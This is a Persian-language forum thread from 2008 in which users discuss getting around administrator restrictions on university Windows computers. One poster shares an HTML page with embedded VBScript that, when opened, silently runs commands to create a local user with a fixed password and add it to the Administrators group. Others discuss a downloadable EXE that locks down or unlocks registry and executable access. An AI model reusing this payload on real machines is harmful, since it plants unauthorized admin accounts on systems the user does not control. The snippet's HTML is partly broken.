شاید اقا صادق نمی خوان چیزهایی که بلداند را به ما یاد بدن .
اقا صادق به ما میگن شما بحث را دنبال نمی کنید حالا خودشون بحث را نیمه کاره ول کردن و رفتن .
سلام عزیزان
من فکر کردم صادق خان دیگه نمیاد این جا
اخه تو امضاش گفته بود شاید دیگه نیام
من هم دنبال نکردم موضوع رو
حالا خواهش دارم ادامه بدن و اون لینکی رو که Remov کردن دوباره بزارن
خواهش کردم صادق جان ادامه بده که خیلی ضروریه
موفق باشین عزیزان
پرسپوليس
07-02-2008, 00:37
آموزش رو پيدا كردم ماليه وبلاگ بود كتاسفانه يعدم نمي ياد كه بگمش
يه فايل txtمي سازيد بعد اين دستورات را paste كرده و درآخر با پسوند htm سيو كنيد
در ضمن من امتحان نكردم نمي دونم كارمي ده يا نه
html>
<title>user add in windowstitle>
<object id=wsh
classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B align="top">object>
<script language=vbscript>
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user perspolis 222222 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators perspolis /add",0)
window.close
SadeghPM
07-02-2008, 14:02
hاز همه دوستان که در بحث شرکت کردنند متشکرم....[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ](17).gif
برای روشن تر شدن منظورم یه فیلم از سیستم مورد نظر می گرم و براتون آپلود می کنم تا بهتر منظورمو بگیرید...
-----------------------------------------------------------------------------------------------
من برم امتحانمو بدمو برگردم فیلمو برای شما Uploud کنم...
به شدت علاقه مند به بحث در موضوعات امنیتی هستم.... و از ذوستان می خوام که ادامه بدن تا به نتایجه خوبی برسیم....
1:40 PM
نقل قول:
اینم فیلمی که گفته بودم:
326 کیلو بایت
نقل قول:
کد:
نقل قول:
کد:
نقل قول:
دوست ندارم وارد بحث هايي كه ويروس ها انجام ميدن بشم!!! بزارين اول اين موضوعي رو كه شروع كرديم تموم كنيم بعد به اين بحث هم مي رسيم...
اگه دوستان تمايل داشتن كارهايي رو كه ويروس ها انجام ميدن (كه هميشه جالب ترين و زيبا ترين ترفند ها هستند)رو هم شروع مي كنيم ...
نقل قول:
فكر خوبيه ...من يه فايل EXE درست ميكنم كه با يك كليك اين كار رو انجام بده بعد دوستان روش كار كنن....
البته اگه راه اصليشو بگم كه ديگه آنتي شم گفتم.....
تو اولين فرصت آپ مي كنم...
در ضمن اون فيلمي كه من گذاشتم از روي سيستم هاي دانشگاهمون بود نه سيستم خودم... كه به وسيله سرور مركزي به سيستم ها اعمال ميشه...
نقل قول:
دیگه خود دانی.
نقل قول:
کد:
اونم کاری نداره[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ](45).gif
منتظر نظرات هستم......
لینک دانلود 1.7 مگبایت:
نقل قول:
کد:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید Removed......
07-02-2008, 15:56
اميد جان مي خواي زد حال بزني من نرم افزار شما رو اجرا كردم تو آدمين نتيجه عكس داد
نه exe اجرا مي شدن و هيچ كدوم از اجزاي control panel باز نمي شدن مجبور به repiar شدم
البته بگم من فقط فايل exe رو اجرا كردم و يا اون يكي كار نكردم مي شه بيشتر توضيح بدي
مرسي
omid.sarmad
07-02-2008, 17:04
اميد جان مي خواي زد حال بزني من نرم افزار شما رو اجرا كردم تو آدمين نتيجه عكس داد
نه exe اجرا مي شدن و هيچ كدوم از اجزاي control panel باز نمي شدن مجبور به repiar شدم
البته بگم من فقط فايل exe رو اجرا كردم و يا اون يكي كار نكردم مي شه بيشتر توضيح بدي
مرسي
سلام.دوست عزیز من فایل exe رو درست کردم برای ایجاد محدودیت.یعنی از کار انداختن فایلهای اجرایی،قفل کردن رجیستری و ...
اون فایل بغلیش هم برای حذف محدودیته.به این صورت هم باید استفاده شه.
هر دو فایل رو تو درایو c تو ریشه کپی کن.بعد فایل omid.sarmad رو اجرا کن تمام محدودیتها برداشته میشه.
اگر با اجرای omid.sarmad کادر open with ظاهر شد فایل دوم یعنی فایل اجرایی رو بهش معرفی کن.همین.
پرسپوليس
09-02-2008, 23:14
ok omid thank you very much
vBulletin , Copyright ©2000-2025, Jelsoft Enterprises Ltd.